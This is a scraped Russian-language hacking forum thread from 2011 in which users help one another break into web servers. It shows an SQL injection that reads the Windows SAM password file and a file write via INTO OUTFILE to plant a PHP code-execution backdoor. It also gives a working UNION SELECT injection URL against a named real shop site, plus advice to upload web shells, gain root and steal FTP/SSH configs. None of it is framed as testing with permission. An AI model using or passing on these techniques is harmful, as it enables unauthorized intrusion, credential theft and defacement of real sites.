
06.01.2011, 20:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
2Chest3r залей шелл , и потом пофантазируй как и что можно ...
напрмиер можно батник засунуть в автозагрузку и ждать ребута (или найти вариант ребутнуть сервак) или.... с шелла можешь уже поковырять все конфиги (если прав будет) и там уже будет видно ...
P.S мб словишь конфиги к ftp/ssh/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|

06.01.2011, 21:30
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 2
С нами:
8679501
Репутация:
0
|
|
Вобщем, дело сделано, но частично. Отдельное спасибо товарищам CodeSender, Ponchik и ornot!
А дело было так! Первоначально файл был прочитан путем хексирования в SQL-запросе - hex(load_file(0x633a5c77696e646f77735c726570616972 5c73616d)) , далее сохранил страницу в браузере полностью, открыл в блокноте, обрезал лишнее, а потом конвертировал всю эту муть в HEX-редакторе.
Далее файл успешно был скормлен программе SAMInside, однако эта программка как и следовало ожидать, еще и потребовала файл SYSTEM. Тут к сожалению облом - файл весит почти 4 мегабайта и на странице ничего не отображается. Есть какие нибудь идеи по этому поводу? Порылся по разным форумам, нигде не встретилось чтение большого файла через SQL-иньекцию.
Сообщение от Expl0ited
Через MySQL залить можно, а вот выполнить нет.
Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так
Код:
SELECT c FROM t UNION ALL SELECT '' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение'
и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo() ;
Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.
Спасибо! Обязательно попробую.
Сообщение от shell_c0de
P.S мб словишь конфиги к ftp/ssh/etc...
О_о Классная идея! Почему раньше об этом не подумал... Спасибо!
|
|
|

06.01.2011, 22:04
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
я не знаю может ли такое даже работать, но попробуй например обрезать какнибудь.
substring(LOAD_FILE(''),1,1000) если получится то просто скрипт написать и вытащить потихоньку
|
|
|

06.01.2011, 22:18
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от ALIM
атипичная скуль, не могу разкрутить
http://www.masterpiecedistribution.com/shop/ultime_uscite.php?order_id=&id=22381 and 1=1 --
Как-то я не особо понял что там такого сложного
Код:
http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- 1
|
|
|

06.01.2011, 22:39
|
|
Новичок
Регистрация: 12.10.2010
Сообщений: 4
С нами:
8201846
Репутация:
0
|
|
Вопрос про уязвимость
На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
|
|
|

06.01.2011, 23:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от USERDEAD
На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
у меня классная идея!!! залить php скрипт!
P.S если без шуток то залей шелл и порутай сервак )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|

07.01.2011, 01:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от NemTaq
вбил ковычку get запросом, появилась такая ошибка:
возможно ли провести атаку через эту ошибку?
да.......
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|

07.01.2011, 20:03
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
следующий вопрос.
Имеем инъекцию, будем считать, что нам ничего не мешает раскрутить ее и получить логин,хэш админа.
Но бывает так, что эти действия бесполезны,т.к. админка находится не на самом уязвимом ресурсе, а на хостере, напримеР, http://www.vul-sait.com:2082/
То есть в админку нам не попасть.
Тут и возникают несколько вопросов.
Может быть все таки можно что то делать дальше?
Если не попасть в админку, то как посредством sql через инъекцию редактировать/слить БД, сделать дефейс ну и т.д....всевозможные действия..?
|
|
|

07.01.2011, 20:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
а может там всё таки просто есть админка, но ты её найти не можешь?
|
|
|

07.01.2011, 20:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
пускай даже я не могу ее найти.
Интересно, что можно делать используя sql
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|